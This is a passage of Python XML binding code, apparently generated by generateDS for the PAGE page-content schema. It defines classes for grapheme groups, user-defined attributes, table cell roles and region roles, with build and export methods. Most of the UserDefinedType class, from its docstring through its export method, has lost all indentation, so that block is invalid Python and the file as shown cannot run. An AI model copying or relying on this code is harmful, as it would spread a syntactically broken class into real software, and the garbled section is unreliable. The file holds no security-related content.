            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='NonPrintingCharType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='NonPrintingCharType'):
        super(NonPrintingCharType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NonPrintingCharType')
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NonPrintingCharType', fromsubclass_=False, pretty_print=True):
        super(NonPrintingCharType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree node: attributes first,
        # then recurse into child elements. Returns self for chaining.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(NonPrintingCharType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # NOTE(review): gds_collector_ is not forwarded to the base class,
        # so validation messages from TextEquiv children are dropped —
        # confirm whether intentional.
        super(NonPrintingCharType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class NonPrintingCharType
class GraphemeGroupType(GraphemeBaseType):
    """A group of graphemes and/or non-printing characters.

    Extends GraphemeBaseType with two repeatable child collections
    (Grapheme, NonPrintingChar) in addition to the inherited attributes
    and TextEquiv children.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema member specification for the additional child lists.
    member_data_items_ = [
        MemberSpec_('Grapheme', 'GraphemeType', 1, 1, {'name': 'Grapheme', 'type': 'GraphemeType'}, 9),
        MemberSpec_('NonPrintingChar', 'NonPrintingCharType', 1, 1, {'name': 'NonPrintingChar', 'type': 'NonPrintingCharType'}, 9),
    ]
    subclass = None
    superclass = GraphemeBaseType
    def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, Grapheme=None, NonPrintingChar=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Delegate the shared attributes/TextEquiv handling to the base class.
        super(globals().get("GraphemeGroupType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv,  **kwargs_)
        # Each list-valued child defaults to a fresh list per instance.
        if Grapheme is None:
            self.Grapheme = []
        else:
            self.Grapheme = Grapheme
        self.Grapheme_nsprefix_ = "pc"
        if NonPrintingChar is None:
            self.NonPrintingChar = []
        else:
            self.NonPrintingChar = NonPrintingChar
        self.NonPrintingChar_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Instantiate a registered override subclass when one is active,
        # otherwise fall back to this generated class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GraphemeGroupType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GraphemeGroupType.subclass:
            return GraphemeGroupType.subclass(*args_, **kwargs_)
        else:
            return GraphemeGroupType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # Generated accessor/mutator trio for each list-valued child.
    def get_Grapheme(self):
        return self.Grapheme
    def set_Grapheme(self, Grapheme):
        self.Grapheme = Grapheme
    def add_Grapheme(self, value):
        self.Grapheme.append(value)
    def insert_Grapheme_at(self, index, value):
        self.Grapheme.insert(index, value)
    def replace_Grapheme_at(self, index, value):
        self.Grapheme[index] = value
    def get_NonPrintingChar(self):
        return self.NonPrintingChar
    def set_NonPrintingChar(self, NonPrintingChar):
        self.NonPrintingChar = NonPrintingChar
    def add_NonPrintingChar(self, value):
        self.NonPrintingChar.append(value)
    def insert_NonPrintingChar_at(self, index, value):
        self.NonPrintingChar.insert(index, value)
    def replace_NonPrintingChar_at(self, index, value):
        self.NonPrintingChar[index] = value
    def hasContent_(self):
        # True when any own child list is non-empty or the base class has
        # content (TextEquiv).
        if (
            self.Grapheme or
            self.NonPrintingChar or
            super(GraphemeGroupType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeGroupType', pretty_print=True):
        # Serialize this element to ``outfile``: opening tag + attributes,
        # then children, then closing tag. ``pretty_print`` toggles newlines.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeGroupType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GraphemeGroupType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeGroupType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeGroupType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeGroupType'):
        super(GraphemeGroupType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeGroupType')
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeGroupType', fromsubclass_=False, pretty_print=True):
        # Base-class children (TextEquiv) first, then own child lists.
        super(GraphemeGroupType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Grapheme_ in self.Grapheme:
            namespaceprefix_ = self.Grapheme_nsprefix_ + ':' if (UseCapturedNS_ and self.Grapheme_nsprefix_) else ''
            Grapheme_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grapheme', pretty_print=pretty_print)
        for NonPrintingChar_ in self.NonPrintingChar:
            namespaceprefix_ = self.NonPrintingChar_nsprefix_ + ':' if (UseCapturedNS_ and self.NonPrintingChar_nsprefix_) else ''
            NonPrintingChar_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NonPrintingChar', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree node: attributes first,
        # then recurse into child elements. Returns self for chaining.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(GraphemeGroupType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Own children first, then base-class dispatch (TextEquiv).
        if nodeName_ == 'Grapheme':
            obj_ = GraphemeType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Grapheme.append(obj_)
            obj_.original_tagname_ = 'Grapheme'
        elif nodeName_ == 'NonPrintingChar':
            obj_ = NonPrintingCharType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.NonPrintingChar.append(obj_)
            obj_.original_tagname_ = 'NonPrintingChar'
        # NOTE(review): gds_collector_ is not forwarded to the base class,
        # so validation messages from TextEquiv children are dropped —
        # confirm whether intentional.
        super(GraphemeGroupType, self).buildChildren(child_, node, nodeName_, True)
# end class GraphemeGroupType
class UserDefinedType(GeneratedsSuper):
"""Container for user-defined attributes"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('UserAttribute', 'UserAttributeType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'UserAttribute', 'type': 'UserAttributeType'}, None),
]
subclass = None
superclass = None
def __init__(self, UserAttribute=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if UserAttribute is None:
self.UserAttribute = []
else:
self.UserAttribute = UserAttribute
self.UserAttribute_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UserDefinedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UserDefinedType.subclass:
return UserDefinedType.subclass(*args_, **kwargs_)
else:
return UserDefinedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserAttribute(self):
return self.UserAttribute
def set_UserAttribute(self, UserAttribute):
self.UserAttribute = UserAttribute
def add_UserAttribute(self, value):
self.UserAttribute.append(value)
def insert_UserAttribute_at(self, index, value):
self.UserAttribute.insert(index, value)
def replace_UserAttribute_at(self, index, value):
self.UserAttribute[index] = value
def hasContent_(self):
if (
self.UserAttribute
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserDefinedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UserDefinedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UserDefinedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UserDefinedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UserDefinedType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UserDefinedType'):
        # UserDefinedType declares no XML attributes of its own.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserDefinedType', fromsubclass_=False, pretty_print=True):
        """Serialize each child UserAttribute element to *outfile*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # NOTE: eol_ is computed for parity with other generated exporters
        # but is not used in this method.
        for UserAttribute_ in self.UserAttribute:
            namespaceprefix_ = self.UserAttribute_nsprefix_ + ':' if (UseCapturedNS_ and self.UserAttribute_nsprefix_) else ''
            UserAttribute_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserAttribute', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace qualifier from the child's tag name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # UserDefinedType declares no XML attributes, so nothing to parse.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch one parsed child element: only UserAttribute is expected."""
        if nodeName_ == 'UserAttribute':
            obj_ = UserAttributeType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserAttribute.append(obj_)
            obj_.original_tagname_ = 'UserAttribute'
# end class UserDefinedType
class UserAttributeType(GeneratedsSuper):
    """Structured custom data defined by name, type and value.

    Maps the ``UserAttribute`` element of the PAGE schema.  All four
    members (``name``, ``description``, ``type`` and ``value``) are XML
    attributes; the element itself carries no child content.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('name', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('description', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'typeType3', 0, 1, {'use': 'optional'}),
        MemberSpec_('value', 'string', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, name=None, description=None, type_=None, value=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.name = _cast(None, name)
        self.name_nsprefix_ = None
        self.description = _cast(None, description)
        self.description_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.value = _cast(None, value)
        self.value_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, UserAttributeType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if UserAttributeType.subclass:
            return UserAttributeType.subclass(*args_, **kwargs_)
        else:
            return UserAttributeType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        # Accessor for the XML namespace prefix captured for this element.
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        # Mutator for the XML namespace prefix used when exporting.
        self.ns_prefix_ = ns_prefix
    def get_name(self):
        return self.name
    def set_name(self, name):
        self.name = name
    def get_description(self):
        return self.description
    def set_description(self, description):
        self.description = description
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_value(self):
        return self.value
    def set_value(self, value):
        self.value = value
    def validate_typeType3(self, value):
        """Validate *value* against typeType3 (an xsd enumeration
        restriction on string).

        Records a message on the collector and returns False when
        validation fails; returns True otherwise.  (The generated
        original assigned an unused ``result`` flag and returned
        inconsistently; this version always returns a bool.)
        """
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['xsd:string', 'xsd:integer', 'xsd:boolean', 'xsd:float']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType3' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                return False
        return True
    def hasContent_(self):
        # Attribute-only element: never has child content.  (The generated
        # original tested an empty tuple, which is always falsy.)
        return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserAttributeType', pretty_print=True):
        """Serialize this element and its attributes to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('UserAttributeType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'UserAttributeType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UserAttributeType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UserAttributeType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UserAttributeType'):
        """Write the name/description/type/value XML attributes."""
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
        if self.description is not None and 'description' not in already_processed:
            already_processed.add('description')
            outfile.write(' description=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.description), input_name='description')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.value is not None and 'value' not in already_processed:
            already_processed.add('value')
            outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserAttributeType', fromsubclass_=False, pretty_print=True):
        # No child elements to serialize.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the XML attributes from *node* into this instance."""
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
        value = find_attr_value_('description', node)
        if value is not None and 'description' not in already_processed:
            already_processed.add('description')
            self.description = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_typeType3(self.type_)    # validate type typeType3
        value = find_attr_value_('value', node)
        if value is not None and 'value' not in already_processed:
            already_processed.add('value')
            self.value = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements expected.
        pass
# end class UserAttributeType
class TableCellRoleType(GeneratedsSuper):
    """Role of a region as a cell inside a table.

    XML attributes of the ``TableCellRole`` element:
      rowIndex    -- cell position in the table, starting with row 0 (required)
      columnIndex -- cell position in the table, starting with column 0 (required)
      rowSpan     -- number of rows the cell spans (optional; default is 1)
      colSpan     -- number of columns the cell spans (optional; default is 1)
      header      -- whether the cell is a column or row header (optional)
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('rowIndex', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('columnIndex', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('rowSpan', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('colSpan', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('header', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, rowIndex=None, columnIndex=None, rowSpan=None, colSpan=None, header=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.rowIndex = _cast(int, rowIndex)
        self.rowIndex_nsprefix_ = None
        self.columnIndex = _cast(int, columnIndex)
        self.columnIndex_nsprefix_ = None
        self.rowSpan = _cast(int, rowSpan)
        self.rowSpan_nsprefix_ = None
        self.colSpan = _cast(int, colSpan)
        self.colSpan_nsprefix_ = None
        self.header = _cast(bool, header)
        self.header_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Create an instance, honoring any registered subclass override.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TableCellRoleType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TableCellRoleType.subclass:
            return TableCellRoleType.subclass(*args_, **kwargs_)
        else:
            return TableCellRoleType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_rowIndex(self):
        return self.rowIndex
    def set_rowIndex(self, rowIndex):
        self.rowIndex = rowIndex
    def get_columnIndex(self):
        return self.columnIndex
    def set_columnIndex(self, columnIndex):
        self.columnIndex = columnIndex
    def get_rowSpan(self):
        return self.rowSpan
    def set_rowSpan(self, rowSpan):
        self.rowSpan = rowSpan
    def get_colSpan(self):
        return self.colSpan
    def set_colSpan(self, colSpan):
        self.colSpan = colSpan
    def get_header(self):
        return self.header
    def set_header(self, header):
        self.header = header
    def hasContent_(self):
        # NOTE: the generated condition below is an empty tuple, which is
        # always falsy -- this attribute-only class never reports content.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableCellRoleType', pretty_print=True):
        """Serialize this element and its attributes to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TableCellRoleType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'TableCellRoleType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableCellRoleType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TableCellRoleType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TableCellRoleType'):
        """Write the rowIndex/columnIndex/rowSpan/colSpan/header attributes."""
        if self.rowIndex is not None and 'rowIndex' not in already_processed:
            already_processed.add('rowIndex')
            outfile.write(' rowIndex="%s"' % self.gds_format_integer(self.rowIndex, input_name='rowIndex'))
        if self.columnIndex is not None and 'columnIndex' not in already_processed:
            already_processed.add('columnIndex')
            outfile.write(' columnIndex="%s"' % self.gds_format_integer(self.columnIndex, input_name='columnIndex'))
        if self.rowSpan is not None and 'rowSpan' not in already_processed:
            already_processed.add('rowSpan')
            outfile.write(' rowSpan="%s"' % self.gds_format_integer(self.rowSpan, input_name='rowSpan'))
        if self.colSpan is not None and 'colSpan' not in already_processed:
            already_processed.add('colSpan')
            outfile.write(' colSpan="%s"' % self.gds_format_integer(self.colSpan, input_name='colSpan'))
        if self.header is not None and 'header' not in already_processed:
            already_processed.add('header')
            outfile.write(' header="%s"' % self.gds_format_boolean(self.header, input_name='header'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableCellRoleType', fromsubclass_=False, pretty_print=True):
        # No child elements to serialize.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the XML attributes from *node* into this instance."""
        value = find_attr_value_('rowIndex', node)
        if value is not None and 'rowIndex' not in already_processed:
            already_processed.add('rowIndex')
            self.rowIndex = self.gds_parse_integer(value, node, 'rowIndex')
        value = find_attr_value_('columnIndex', node)
        if value is not None and 'columnIndex' not in already_processed:
            already_processed.add('columnIndex')
            self.columnIndex = self.gds_parse_integer(value, node, 'columnIndex')
        value = find_attr_value_('rowSpan', node)
        if value is not None and 'rowSpan' not in already_processed:
            already_processed.add('rowSpan')
            self.rowSpan = self.gds_parse_integer(value, node, 'rowSpan')
        value = find_attr_value_('colSpan', node)
        if value is not None and 'colSpan' not in already_processed:
            already_processed.add('colSpan')
            self.colSpan = self.gds_parse_integer(value, node, 'colSpan')
        value = find_attr_value_('header', node)
        if value is not None and 'header' not in already_processed:
            already_processed.add('header')
            # Accept the xsd:boolean lexical forms only.
            if value in ('true', '1'):
                self.header = True
            elif value in ('false', '0'):
                self.header = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements expected.
        pass
# end class TableCellRoleType
class RolesType(GeneratedsSuper):
    """Container for the roles a region may take on.

    Holds at most one ``TableCellRole`` child element.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('TableCellRole', 'TableCellRoleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TableCellRole', 'type': 'TableCellRoleType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, TableCellRole=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.TableCellRole = TableCellRole
        self.TableCellRole_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Create an instance, honoring any registered subclass override.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, RolesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if RolesType.subclass:
            return RolesType.subclass(*args_, **kwargs_)
        else:
            return RolesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_TableCellRole(self):
        return self.TableCellRole
    def set_TableCellRole(self, TableCellRole):
        self.TableCellRole = TableCellRole
    def hasContent_(self):
        # Content exists when the single optional child is set.
        if (
            self.TableCellRole is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RolesType', pretty_print=True):
        """Serialize this element and its child to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RolesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'RolesType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RolesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RolesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RolesType'):
        # RolesType declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RolesType', fromsubclass_=False, pretty_print=True):
        """Serialize the optional TableCellRole child element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.TableCellRole is not None:
            namespaceprefix_ = self.TableCellRole_nsprefix_ + ':' if (UseCapturedNS_ and self.TableCellRole_nsprefix_) else ''
            self.TableCellRole.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableCellRole', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
